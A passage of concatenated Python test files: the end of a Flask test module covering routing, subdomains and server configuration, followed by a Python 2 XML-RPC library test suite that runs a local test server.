flask.Flask(__name__, host_matching=True, static_folder=None)
def test_request_locals():
assert repr(flask.g) == "<LocalProxy unbound>"
assert not flask.g
def test_server_name_subdomain():
app = flask.Flask(__name__, subdomain_matching=True)
client = app.test_client()
@app.route("/")
def index():
return "default"
@app.route("/", subdomain="foo")
def subdomain():
return "subdomain"
app.config["SERVER_NAME"] = "dev.local:5000"
rv = client.get("/")
assert rv.data == b"default"
rv = client.get("/", "http://dev.local:5000")
assert rv.data == b"default"
rv = client.get("/", "https://dev.local:5000")
assert rv.data == b"default"
app.config["SERVER_NAME"] = "dev.local:443"
rv = client.get("/", "https://dev.local")
# Werkzeug 1.0 fixes matching https scheme with 443 port
if rv.status_code != 404:
assert rv.data == b"default"
app.config["SERVER_NAME"] = "dev.local"
rv = client.get("/", "https://dev.local")
assert rv.data == b"default"
# suppress Werkzeug 1.0 warning about name mismatch
with pytest.warns(None):
rv = client.get("/", "http://foo.localhost")
assert rv.status_code == 404
rv = client.get("/", "http://foo.dev.local")
assert rv.data == b"subdomain"
@pytest.mark.filterwarnings("ignore::pytest.PytestUnraisableExceptionWarning")
@pytest.mark.filterwarnings("ignore::pytest.PytestUnhandledThreadExceptionWarning")
def test_exception_propagation(app, client):
def apprunner(config_key):
@app.route("/")
def index():
1 // 0
if config_key is not None:
app.config[config_key] = True
with pytest.raises(Exception):
client.get("/")
else:
assert client.get("/").status_code == 500
# we have to run this test in an isolated thread because if the
# debug flag is set to true and an exception happens the context is
# not torn down. This causes other tests that run after this fail
# when they expect no exception on the stack.
for config_key in "TESTING", "PROPAGATE_EXCEPTIONS", "DEBUG", None:
t = Thread(target=apprunner, args=(config_key,))
t.start()
t.join()
@pytest.mark.parametrize("debug", [True, False])
@pytest.mark.parametrize("use_debugger", [True, False])
@pytest.mark.parametrize("use_reloader", [True, False])
@pytest.mark.parametrize("propagate_exceptions", [None, True, False])
def test_werkzeug_passthrough_errors(
monkeypatch, debug, use_debugger, use_reloader, propagate_exceptions, app
):
rv = {}
# Mocks werkzeug.serving.run_simple method
def run_simple_mock(*args, **kwargs):
rv["passthrough_errors"] = kwargs.get("passthrough_errors")
monkeypatch.setattr(werkzeug.serving, "run_simple", run_simple_mock)
app.config["PROPAGATE_EXCEPTIONS"] = propagate_exceptions
app.run(debug=debug, use_debugger=use_debugger, use_reloader=use_reloader)
def test_max_content_length(app, client):
app.config["MAX_CONTENT_LENGTH"] = 64
@app.before_request
def always_first():
flask.request.form["myfile"]
AssertionError()
@app.route("/accept", methods=["POST"])
def accept_file():
flask.request.form["myfile"]
AssertionError()
@app.errorhandler(413)
def catcher(error):
return "42"
rv = client.post("/accept", data={"myfile": "foo" * 100})
assert rv.data == b"42"
def test_url_processors(app, client):
@app.url_defaults
def add_language_code(endpoint, values):
if flask.g.lang_code is not None and app.url_map.is_endpoint_expecting(
endpoint, "lang_code"
):
values.setdefault("lang_code", flask.g.lang_code)
@app.url_value_preprocessor
def pull_lang_code(endpoint, values):
flask.g.lang_code = values.pop("lang_code", None)
@app.route("/<lang_code>/")
def index():
return flask.url_for("about")
@app.route("/<lang_code>/about")
def about():
return flask.url_for("something_else")
@app.route("/foo")
def something_else():
return flask.url_for("about", lang_code="en")
assert client.get("/de/").data == b"/de/about"
assert client.get("/de/about").data == b"/foo"
assert client.get("/foo").data == b"/en/about"
def test_inject_blueprint_url_defaults(app):
bp = flask.Blueprint("foo", __name__, template_folder="template")
@bp.url_defaults
def bp_defaults(endpoint, values):
values["page"] = "login"
@bp.route("/<page>")
def view(page):
pass
app.register_blueprint(bp)
values = dict()
app.inject_url_defaults("foo.view", values)
expected = dict(page="login")
assert values == expected
with app.test_request_context("/somepage"):
url = flask.url_for("foo.view")
expected = "/login"
assert url == expected
def test_nonascii_pathinfo(app, client):
@app.route("/киртест")
def index():
return "Hello World!"
rv = client.get("/киртест")
assert rv.data == b"Hello World!"
def test_debug_mode_complains_after_first_request(app, client):
app.debug = True
@app.route("/")
def index():
return "Awesome"
assert not app.got_first_request
assert client.get("/").data == b"Awesome"
with pytest.raises(AssertionError) as e:
@app.route("/foo")
def broken():
return "Meh"
assert "A setup function was called" in str(e.value)
app.debug = False
@app.route("/foo")
def working():
return "Meh"
assert client.get("/foo").data == b"Meh"
assert app.got_first_request
def test_before_first_request_functions(app, client):
got = []
@app.before_first_request
def foo():
got.append(42)
client.get("/")
assert got == [42]
client.get("/")
assert got == [42]
assert app.got_first_request
def test_before_first_request_functions_concurrent(app, client):
got = []
@app.before_first_request
def foo():
time.sleep(0.2)
got.append(42)
def get_and_assert():
client.get("/")
assert got == [42]
t = Thread(target=get_and_assert)
t.start()
get_and_assert()
t.join()
assert app.got_first_request
def test_routing_redirect_debugging(app, client):
app.debug = True
@app.route("/foo/", methods=["GET", "POST"])
def foo():
return "success"
with client:
with pytest.raises(AssertionError) as e:
client.post("/foo", data={})
assert "http://localhost/foo/" in str(e.value)
assert "Make sure to directly send your POST-request to this URL" in str(
e.value
)
rv = client.get("/foo", data={}, follow_redirects=True)
assert rv.data == b"success"
app.debug = False
with client:
rv = client.post("/foo", data={}, follow_redirects=True)
assert rv.data == b"success"
def test_route_decorator_custom_endpoint(app, client):
app.debug = True
@app.route("/foo/")
def foo():
return flask.request.endpoint
@app.route("/bar/", endpoint="bar")
def for_bar():
return flask.request.endpoint
@app.route("/bar/123", endpoint="123")
def for_bar_foo():
return flask.request.endpoint
with app.test_request_context():
assert flask.url_for("foo") == "/foo/"
assert flask.url_for("bar") == "/bar/"
assert flask.url_for("123") == "/bar/123"
assert client.get("/foo/").data == b"foo"
assert client.get("/bar/").data == b"bar"
assert client.get("/bar/123").data == b"123"
def test_preserve_only_once(app, client):
app.debug = True
@app.route("/fail")
def fail_func():
1 // 0
for _x in range(3):
with pytest.raises(ZeroDivisionError):
client.get("/fail")
assert flask._request_ctx_stack.top is not None
assert flask._app_ctx_stack.top is not None
# implicit appctx disappears too
flask._request_ctx_stack.top.pop()
assert flask._request_ctx_stack.top is None
assert flask._app_ctx_stack.top is None
def test_preserve_remembers_exception(app, client):
app.debug = True
errors = []
@app.route("/fail")
def fail_func():
1 // 0
@app.route("/success")
def success_func():
return "Okay"
@app.teardown_request
def teardown_handler(exc):
errors.append(exc)
# After this failure we did not yet call the teardown handler
with pytest.raises(ZeroDivisionError):
client.get("/fail")
assert errors == []
# But this request triggers it, and it's an error
client.get("/success")
assert len(errors) == 2
assert isinstance(errors[0], ZeroDivisionError)
# At this point another request does nothing.
client.get("/success")
assert len(errors) == 3
assert errors[1] is None
def test_get_method_on_g(app_ctx):
assert flask.g.get("x") is None
assert flask.g.get("x", 11) == 11
flask.g.x = 42
assert flask.g.get("x") == 42
assert flask.g.x == 42
def test_g_iteration_protocol(app_ctx):
flask.g.foo = 23
flask.g.bar = 42
assert "foo" in flask.g
assert "foos" not in flask.g
assert sorted(flask.g) == ["bar", "foo"]
def test_subdomain_basic_support():
app = flask.Flask(__name__, subdomain_matching=True)
app.config["SERVER_NAME"] = "localhost.localdomain"
client = app.test_client()
@app.route("/")
def normal_index():
return "normal index"
@app.route("/", subdomain="test")
def test_index():
return "test index"
rv = client.get("/", "http://localhost.localdomain/")
assert rv.data == b"normal index"
rv = client.get("/", "http://test.localhost.localdomain/")
assert rv.data == b"test index"
def test_subdomain_matching():
app = flask.Flask(__name__, subdomain_matching=True)
client = app.test_client()
app.config["SERVER_NAME"] = "localhost.localdomain"
@app.route("/", subdomain="<user>")
def index(user):
return f"index for {user}"
rv = client.get("/", "http://mitsuhiko.localhost.localdomain/")
assert rv.data == b"index for mitsuhiko"
def test_subdomain_matching_with_ports():
app = flask.Flask(__name__, subdomain_matching=True)
app.config["SERVER_NAME"] = "localhost.localdomain:3000"
client = app.test_client()
@app.route("/", subdomain="<user>")
def index(user):
return f"index for {user}"
rv = client.get("/", "http://mitsuhiko.localhost.localdomain:3000/")
assert rv.data == b"index for mitsuhiko"
@pytest.mark.parametrize("matching", (False, True))
def test_subdomain_matching_other_name(matching):
app = flask.Flask(__name__, subdomain_matching=matching)
app.config["SERVER_NAME"] = "localhost.localdomain:3000"
client = app.test_client()
@app.route("/")
def index():
return "", 204
# suppress Werkzeug 0.15 warning about name mismatch
with pytest.warns(None):
# ip address can't match name
rv = client.get("/", "http://127.0.0.1:3000/")
assert rv.status_code == 404 if matching else 204
# allow all subdomains if matching is disabled
rv = client.get("/", "http://www.localhost.localdomain:3000/")
assert rv.status_code == 404 if matching else 204
def test_multi_route_rules(app, client):
@app.route("/")
@app.route("/<test>/")
def index(test="a"):
return test
rv = client.open("/")
assert rv.data == b"a"
rv = client.open("/b/")
assert rv.data == b"b"
def test_multi_route_class_views(app, client):
class View:
def __init__(self, app):
app.add_url_rule("/", "index", self.index)
app.add_url_rule("/<test>/", "index", self.index)
def index(self, test="a"):
return test
_ = View(app)
rv = client.open("/")
assert rv.data == b"a"
rv = client.open("/b/")
assert rv.data == b"b"
def test_run_defaults(monkeypatch, app):
rv = {}
# Mocks werkzeug.serving.run_simple method
def run_simple_mock(*args, **kwargs):
rv["result"] = "running..."
monkeypatch.setattr(werkzeug.serving, "run_simple", run_simple_mock)
app.run()
assert rv["result"] == "running..."
def test_run_server_port(monkeypatch, app):
rv = {}
# Mocks werkzeug.serving.run_simple method
def run_simple_mock(hostname, port, application, *args, **kwargs):
rv["result"] = f"running on {hostname}:{port} ..."
monkeypatch.setattr(werkzeug.serving, "run_simple", run_simple_mock)
hostname, port = "localhost", 8000
app.run(hostname, port, debug=True)
assert rv["result"] == f"running on {hostname}:{port} ..."
@pytest.mark.parametrize(
"host,port,server_name,expect_host,expect_port",
(
(None, None, "pocoo.org:8080", "pocoo.org", 8080),
("localhost", None, "pocoo.org:8080", "localhost", 8080),
(None, 80, "pocoo.org:8080", "pocoo.org", 80),
("localhost", 80, "pocoo.org:8080", "localhost", 80),
("localhost", 0, "localhost:8080", "localhost", 0),
(None, None, "localhost:8080", "localhost", 8080),
(None, None, "localhost:0", "localhost", 0),
),
)
def test_run_from_config(
monkeypatch, host, port, server_name, expect_host, expect_port, app
):
def run_simple_mock(hostname, port, *args, **kwargs):
assert hostname == expect_host
assert port == expect_port
monkeypatch.setattr(werkzeug.serving, "run_simple", run_simple_mock)
app.config["SERVER_NAME"] = server_name
app.run(host, port)
def test_max_cookie_size(app, client, recwarn):
app.config["MAX_COOKIE_SIZE"] = 100
# outside app context, default to Werkzeug static value,
# which is also the default config
response = flask.Response()
default = flask.Flask.default_config["MAX_COOKIE_SIZE"]
assert response.max_cookie_size == default
# inside app context, use app config
with app.app_context():
assert flask.Response().max_cookie_size == 100
@app.route("/")
def index():
r = flask.Response("", status=204)
r.set_cookie("foo", "bar" * 100)
return r
client.get("/")
assert len(recwarn) == 1
w = recwarn.pop()
assert "cookie is too large" in str(w.message)
app.config["MAX_COOKIE_SIZE"] = 0
client.get("/")
assert len(recwarn) == 0
@require_cpython_gc
def test_app_freed_on_zero_refcount():
# A Flask instance should not create a reference cycle that prevents CPython
# from freeing it when all external references to it are released (see #3761).
gc.disable()
try:
app = flask.Flask(__name__)
assert app.view_functions["static"]
weak = weakref.ref(app)
assert weak() is not None
del app
assert weak() is None
finally:
gc.enable()
|
test_xmlrpc.py
|
import base64
import datetime
import sys
import time
import unittest
import xmlrpclib
import SimpleXMLRPCServer
import threading
import mimetools
import httplib
import socket
import os
from test import test_support
try:
unicode
except NameError:
have_unicode = False
else:
have_unicode = True
alist = [{'astring': 'foo@bar.baz.spam',
'afloat': 7283.43,
'anint': 2**20,
'ashortlong': 2L,
'anotherlist': ['.zyx.41'],
'abase64': xmlrpclib.Binary("my dog has fleas"),
'boolean': xmlrpclib.False,
'unicode': u'\u4000\u6000\u8000',
u'ukey\u4000': 'regular value',
'datetime1': xmlrpclib.DateTime('20050210T11:41:23'),
'datetime2': xmlrpclib.DateTime(
(2005, 02, 10, 11, 41, 23, 0, 1, -1)),
'datetime3': xmlrpclib.DateTime(
datetime.datetime(2005, 02, 10, 11, 41, 23)),
}]
class XMLRPCTestCase(unittest.TestCase):
def test_dump_load(self):
self.assertEquals(alist,
xmlrpclib.loads(xmlrpclib.dumps((alist,)))[0][0])
def test_dump_bare_datetime(self):
# This checks that an unwrapped datetime.date object can be handled
# by the marshalling code. This can't be done via test_dump_load()
# since with use_datetime set to 1 the unmarshaller would create
# datetime objects for the 'datetime[123]' keys as well
dt = datetime.datetime(2005, 02, 10, 11, 41, 23)
s = xmlrpclib.dumps((dt,))
(newdt,), m = xmlrpclib.loads(s, use_datetime=1)
self.assertEquals(newdt, dt)
self.assertEquals(m, None)
(newdt,), m = xmlrpclib.loads(s, use_datetime=0)
self.assertEquals(newdt, xmlrpclib.DateTime('20050210T11:41:23'))
def test_datetime_before_1900(self):
# same as before but with a date before 1900
dt = datetime.datetime(1, 02, 10, 11, 41, 23)
s = xmlrpclib.dumps((dt,))
(newdt,), m = xmlrpclib.loads(s, use_datetime=1)
self.assertEquals(newdt, dt)
self.assertEquals(m, None)
(newdt,), m = xmlrpclib.loads(s, use_datetime=0)
self.assertEquals(newdt, xmlrpclib.DateTime('00010210T11:41:23'))
def test_cmp_datetime_DateTime(self):
now = datetime.datetime.now()
dt = xmlrpclib.DateTime(now.timetuple())
self.assert_(dt == now)
self.assert_(now == dt)
then = now + datetime.timedelta(seconds=4)
self.assert_(then >= dt)
self.assert_(dt < then)
def test_bug_1164912 (self):
d = xmlrpclib.DateTime()
((new_d,), dummy) = xmlrpclib.loads(xmlrpclib.dumps((d,),
methodresponse=True))
self.assert_(isinstance(new_d.value, str))
# Check that the output of dumps() is still an 8-bit string
s = xmlrpclib.dumps((new_d,), methodresponse=True)
self.assert_(isinstance(s, str))
def test_newstyle_class(self):
class T(object):
pass
t = T()
t.x = 100
t.y = "Hello"
((t2,), dummy) = xmlrpclib.loads(xmlrpclib.dumps((t,)))
self.assertEquals(t2, t.__dict__)
def test_dump_big_long(self):
self.assertRaises(OverflowError, xmlrpclib.dumps, (2L**99,))
def test_dump_bad_dict(self):
self.assertRaises(TypeError, xmlrpclib.dumps, ({(1,2,3): 1},))
def test_dump_recursive_seq(self):
l = [1,2,3]
t = [3,4,5,l]
l.append(t)
self.assertRaises(TypeError, xmlrpclib.dumps, (l,))
def test_dump_recursive_dict(self):
d = {'1':1, '2':1}
t = {'3':3, 'd':d}
d['t'] = t
self.assertRaises(TypeError, xmlrpclib.dumps, (d,))
def test_dump_big_int(self):
if sys.maxint > 2L**31-1:
self.assertRaises(OverflowError, xmlrpclib.dumps,
(int(2L**34),))
xmlrpclib.dumps((xmlrpclib.MAXINT, xmlrpclib.MININT))
self.assertRaises(OverflowError, xmlrpclib.dumps, (xmlrpclib.MAXINT+1,))
self.assertRaises(OverflowError, xmlrpclib.dumps, (xmlrpclib.MININT-1,))
def dummy_write(s):
pass
m = xmlrpclib.Marshaller()
m.dump_int(xmlrpclib.MAXINT, dummy_write)
m.dump_int(xmlrpclib.MININT, dummy_write)
self.assertRaises(OverflowError, m.dump_int, xmlrpclib.MAXINT+1, dummy_write)
self.assertRaises(OverflowError, m.dump_int, xmlrpclib.MININT-1, dummy_write)
def test_dump_none(self):
value = alist + [None]
arg1 = (alist + [None],)
strg = xmlrpclib.dumps(arg1, allow_none=True)
self.assertEquals(value,
xmlrpclib.loads(strg)[0][0])
self.assertRaises(TypeError, xmlrpclib.dumps, (arg1,))
def test_default_encoding_issues(self):
# SF bug #1115989: wrong decoding in '_stringify'
utf8 = """<?xml version='1.0' encoding='iso-8859-1'?>
<params>
<param><value>
<string>abc \x95</string>
</value></param>
<param><value>
<struct>
<member>
<name>def \x96</name>
<value><string>ghi \x97</string></value>
</member>
</struct>
</value></param>
</params>
"""
# sys.setdefaultencoding() normally doesn't exist after site.py is
# loaded. reload(sys) is the way to get it back.
old_encoding = sys.getdefaultencoding()
setdefaultencoding_existed = hasattr(sys, "setdefaultencoding")
reload(sys) # ugh!
sys.setdefaultencoding("iso-8859-1")
try:
(s, d), m = xmlrpclib.loads(utf8)
finally:
sys.setdefaultencoding(old_encoding)
if not setdefaultencoding_existed:
del sys.setdefaultencoding
items = d.items()
if have_unicode:
self.assertEquals(s, u"abc \x95")
self.assert_(isinstance(s, unicode))
self.assertEquals(items, [(u"def \x96", u"ghi \x97")])
self.assert_(isinstance(items[0][0], unicode))
self.assert_(isinstance(items[0][1], unicode))
else:
self.assertEquals(s, "abc \xc2\x95")
self.assertEquals(items, [("def \xc2\x96", "ghi \xc2\x97")])
class HelperTestCase(unittest.TestCase):
def test_escape(self):
self.assertEqual(xmlrpclib.escape("a&b"), "a&b")
self.assertEqual(xmlrpclib.escape("a<b"), "a<b")
self.assertEqual(xmlrpclib.escape("a>b"), "a>b")
class FaultTestCase(unittest.TestCase):
def test_repr(self):
f = xmlrpclib.Fault(42, 'Test Fault')
self.assertEqual(repr(f), "<Fault 42: 'Test Fault'>")
self.assertEqual(repr(f), str(f))
def test_dump_fault(self):
f = xmlrpclib.Fault(42, 'Test Fault')
s = xmlrpclib.dumps((f,))
(newf,), m = xmlrpclib.loads(s)
self.assertEquals(newf, {'faultCode': 42, 'faultString': 'Test Fault'})
self.assertEquals(m, None)
s = xmlrpclib.Marshaller().dumps(f)
self.assertRaises(xmlrpclib.Fault, xmlrpclib.loads, s)
class DateTimeTestCase(unittest.TestCase):
def test_default(self):
t = xmlrpclib.DateTime()
def test_time(self):
d = 1181399930.036952
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t), time.strftime("%Y%m%dT%H:%M:%S", time.localtime(d)))
def test_time_tuple(self):
d = (2007,6,9,10,38,50,5,160,0)
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t), '20070609T10:38:50')
def test_time_struct(self):
d = time.localtime(1181399930.036952)
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t), time.strftime("%Y%m%dT%H:%M:%S", d))
def test_datetime_datetime(self):
d = datetime.datetime(2007,1,2,3,4,5)
t = xmlrpclib.DateTime(d)
self.assertEqual(str(t), '20070102T03:04:05')
def test_repr(self):
d = datetime.datetime(2007,1,2,3,4,5)
t = xmlrpclib.DateTime(d)
val ="<DateTime '20070102T03:04:05' at %x>" % id(t)
self.assertEqual(repr(t), val)
def test_decode(self):
d = ' 20070908T07:11:13 '
t1 = xmlrpclib.DateTime()
t1.decode(d)
tref = xmlrpclib.DateTime(datetime.datetime(2007,9,8,7,11,13))
self.assertEqual(t1, tref)
t2 = xmlrpclib._datetime(d)
self.assertEqual(t1, tref)
class BinaryTestCase(unittest.TestCase):
def test_default(self):
t = xmlrpclib.Binary()
self.assertEqual(str(t), '')
def test_string(self):
d = '\x01\x02\x03abc123\xff\xfe'
t = xmlrpclib.Binary(d)
self.assertEqual(str(t), d)
def test_decode(self):
d = '\x01\x02\x03abc123\xff\xfe'
de = base64.encodestring(d)
t1 = xmlrpclib.Binary()
t1.decode(de)
self.assertEqual(str(t1), d)
t2 = xmlrpclib._binary(de)
self.assertEqual(str(t2), d)
PORT = None
# The evt is set twice. First when the server is ready to serve.
# Second when the server has been shutdown. The user must clear
# the event after it has been set the first time to catch the second set.
def http_server(evt, numrequests):
class TestInstanceClass:
def div(self, x, y):
return x // y
def _methodHelp(self, name):
if name == 'div':
return 'This is the div function'
def my_function():
'''This is my function'''
return True
class MyXMLRPCServer(SimpleXMLRPCServer.SimpleXMLRPCServer):
def get_request(self):
# Ensure the socket is always non-blocking. On Linux, socket
# attributes are not inherited like they are on *BSD and Windows.
s, port = self.socket.accept()
s.setblocking(True)
return s, port
try:
serv = MyXMLRPCServer(("localhost", 0),
logRequests=False, bind_and_activate=False)
serv.socket.settimeout(3)
serv.server_bind()
global PORT
PORT = serv.socket.getsockname()[1]
serv.server_activate()
serv.register_introspection_functions()
serv.register_multicall_functions()
serv.register_function(pow)
serv.register_function(lambda x,y: x+y, 'add')
serv.register_function(my_function)
serv.register_instance(TestInstanceClass())
evt.set()
# handle up to 'numrequests' requests
while numrequests > 0:
serv.handle_request()
numrequests -= 1
except socket.timeout:
pass
finally:
serv.socket.close()
PORT = None
evt.set()
# This function prevents errors like:
# <ProtocolError for localhost:57527/RPC2: 500 Internal Server Error>
def is_unavailable_exception(e):
'''Returns True if the given ProtocolError is the product of a server-side
exception caused by the 'temporarily unavailable' response sometimes
given by operations on non-blocking sockets.'''
# sometimes we get a -1 error code and/or empty headers
try:
if e.errcode == -1 or e.headers is None:
return True
exc_mess = e.headers.get('X-exception')
except AttributeError:
# Ignore socket.errors here.
exc_mess = str(e)
if exc_mess and 'temporarily unavailable' in exc_mess.lower():
return True
return False
# NOTE: The tests in SimpleServerTestCase will ignore failures caused by
# "temporarily unavailable" exceptions raised in SimpleXMLRPCServer. This
# condition occurs infrequently on some platforms, frequently on others, and
# is apparently caused by using SimpleXMLRPCServer with a non-blocking socket.
# If the server class is updated at some point in the future to handle this
# situation more gracefully, these tests should be modified appropriately.
class SimpleServerTestCase(unittest.TestCase):
def setUp(self):
# enable traceback reporting
SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = True
self.evt = threading.Event()
# start server thread to handle requests
serv_args = (self.evt, 1)
threading.Thread(target=http_server, args=serv_args).start()
# wait for the server to be ready
self.evt.wait()
self.evt.clear()
def tearDown(self):
# wait on the server thread to terminate
self.evt.wait()
# disable traceback reporting
SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = False
def test_simple1(self):
try:
p = xmlrpclib.ServerProxy('http://localhost:%d' % PORT)
self.assertEqual(p.pow(6,8), 6**8)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
# [ch] The test 404 is causing lots of false alarms.
def XXXtest_404(self):
# send POST with httplib, it should return 404 header and
# 'Not Found' message.
conn = httplib.HTTPConnection('localhost', PORT)
conn.request('POST', '/this-is-not-valid')
response = conn.getresponse()
conn.close()
self.assertEqual(response.status, 404)
self.assertEqual(response.reason, 'Not Found')
def test_introspection1(self):
try:
p = xmlrpclib.ServerProxy('http://localhost:%d' % PORT)
meth = p.system.listMethods()
expected_methods = set(['pow', 'div', 'my_function', 'add',
'system.listMethods', 'system.methodHelp',
'system.methodSignature', 'system.multicall'])
self.assertEqual(set(meth), expected_methods)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_introspection2(self):
try:
# test _methodHelp()
p = xmlrpclib.ServerProxy('http://localhost:%d' % PORT)
divhelp = p.system.methodHelp('div')
self.assertEqual(divhelp, 'This is the div function')
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_introspection3(self):
try:
# test native doc
p = xmlrpclib.ServerProxy('http://localhost:%d' % PORT)
myfunction = p.system.methodHelp('my_function')
self.assertEqual(myfunction, 'This is my function')
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_introspection4(self):
# the SimpleXMLRPCServer doesn't support signatures, but
# at least check that we can try making the call
try:
p = xmlrpclib.ServerProxy('http://localhost:%d' % PORT)
divsig = p.system.methodSignature('div')
self.assertEqual(divsig, 'signatures not supported')
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_multicall(self):
try:
p = xmlrpclib.ServerProxy('http://localhost:%d' % PORT)
multicall = xmlrpclib.MultiCall(p)
multicall.add(2,3)
multicall.pow(6,8)
multicall.div(127,42)
add_result, pow_result, div_result = multicall()
self.assertEqual(add_result, 2+3)
self.assertEqual(pow_result, 6**8)
self.assertEqual(div_result, 127//42)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_non_existing_multicall(self):
try:
p = xmlrpclib.ServerProxy('http://localhost:%d' % PORT)
multicall = xmlrpclib.MultiCall(p)
multicall.this_is_not_exists()
result = multicall()
# result.results contains;
# [{'faultCode': 1, 'faultString': '<type \'exceptions.Exception\'>:'
# 'method "this_is_not_exists" is not supported'>}]
self.assertEqual(result.results[0]['faultCode'], 1)
self.assertEqual(result.results[0]['faultString'],
'<type \'exceptions.Exception\'>:method "this_is_not_exists" '
'is not supported')
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_dotted_attribute(self):
# Raises an AttributeError because private methods are not allowed.
self.assertRaises(AttributeError,
SimpleXMLRPCServer.resolve_dotted_attribute, str, '__add')
self.assert_(SimpleXMLRPCServer.resolve_dotted_attribute(str, 'title'))
# Get the test to run faster by sending a request with test_simple1.
# This avoids waiting for the socket timeout.
self.test_simple1()
# This is a contrived way to make a failure occur on the server side
# in order to test the _send_traceback_header flag on the server
class FailingMessageClass(mimetools.Message):
def __getitem__(self, key):
key = key.lower()
if key == 'content-length':
return 'I am broken'
return mimetools.Message.__getitem__(self, key)
class FailingServerTestCase(unittest.TestCase):
def setUp(self):
self.evt = threading.Event()
# start server thread to handle requests
serv_args = (self.evt, 1)
threading.Thread(target=http_server, args=serv_args).start()
# wait for the server to be ready
self.evt.wait()
self.evt.clear()
def tearDown(self):
# wait on the server thread to terminate
self.evt.wait()
# reset flag
SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = False
# reset message class
SimpleXMLRPCServer.SimpleXMLRPCRequestHandler.MessageClass = mimetools.Message
def test_basic(self):
# check that flag is false by default
flagval = SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header
self.assertEqual(flagval, False)
# enable traceback reporting
SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = True
# test a call that shouldn't fail just as a smoke test
try:
p = xmlrpclib.ServerProxy('http://localhost:%d' % PORT)
self.assertEqual(p.pow(6,8), 6**8)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e):
# protocol error; provide additional information in test output
self.fail("%s\n%s" % (e, getattr(e, "headers", "")))
def test_fail_no_info(self):
# use the broken message class
SimpleXMLRPCServer.SimpleXMLRPCRequestHandler.MessageClass = FailingMessageClass
try:
p = xmlrpclib.ServerProxy('http://localhost:%d' % PORT)
p.pow(6,8)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e) and hasattr(e, "headers"):
# The two server-side error headers shouldn't be sent back in this case
self.assertTrue(e.headers.get("X-exception") is None)
self.assertTrue(e.headers.get("X-traceback") is None)
else:
self.fail('ProtocolError not raised')
def test_fail_with_info(self):
# use the broken message class
SimpleXMLRPCServer.SimpleXMLRPCRequestHandler.MessageClass = FailingMessageClass
# Check that errors in the server send back exception/traceback
# info when flag is set
SimpleXMLRPCServer.SimpleXMLRPCServer._send_traceback_header = True
try:
p = xmlrpclib.ServerProxy('http://localhost:%d' % PORT)
p.pow(6,8)
except (xmlrpclib.ProtocolError, socket.error), e:
# ignore failures due to non-blocking socket 'unavailable' errors
if not is_unavailable_exception(e) and hasattr(e, "headers"):
# We should get error info in the response
expected_err = "invalid literal for int() with base 10: 'I am broken'"
self.assertEqual(e.headers.get("x-exception"), expected_err)
self.assertTrue(e.headers.get("x-traceback") is not None)
else:
self.fail('ProtocolError not raised')
class CGIHandlerTestCase(unittest.TestCase):
def setUp(self):
self.cgi = SimpleXMLRPCServer.CGIXMLRPCRequestHandler()
def tearDown(self):
self.cgi = None
def test_cgi_get(self):
os.environ['REQUEST_METHOD'] = 'GET'
# if the method is GET and no request_text is given, it runs handle_get
# get sysout output
tmp = sys.stdout
sys.stdout = open(test_support.TESTFN, "w")
self.cgi.handle_request()
sys.stdout.close()
sys.stdout = tmp
# parse Status header
handle = open(test_support.TESTFN, "r").read()
status = handle.split()[1]
message = ' '.join(handle.split()[2:4])
self.assertEqual(status, '400')
self.assertEqual(message, 'Bad Request')
os.remove(test_support.TESTFN)
os.environ['REQUEST_METHOD'] = ''
def test_cgi_xmlrpc_response(self):
data = """<?xml version='1.0'?>
<methodCall>
<methodName>test_method</methodName>
<params>
<param>
<value><string>foo</string></value>
</param>
<param>
<value><string>bar</string></value>
</param>
</params>
</methodCall>
"""
open("xmldata.txt", "w").write(data)
tmp1 = sys.stdin
tmp2 = sys.stdout
sys.stdin = open("xmldata.txt", "r")
sys.stdout = open(test_support.TESTFN, "w")
self.cgi.handle_request()
sys.stdin.close()
sys.stdout.close()
sys.stdin = tmp1
sys.stdout = tmp2
# will respond exception, if so, our goal is achieved ;)
handle = open(test_support.TESTFN, "r").read()
# start with 44th char so as not to get http header, we just need only xml
self.assertRaises(xmlrpclib.Fault, xmlrpclib.loads, handle[44:])
os.remove("xmldata.txt")
os.remove(test_support.TESTFN)
def test_main():
xmlrpc_tests = [XMLRPCTestCase, HelperTestCase, DateTimeTestCase,
BinaryTestCase, FaultTestCase]
# The test cases against a SimpleXMLRPCServer raise a socket error
# 10035 (WSAEWOULDBLOCK) in the server thread handle_request call when
# run on Windows. This only happens on the first test to run, but it
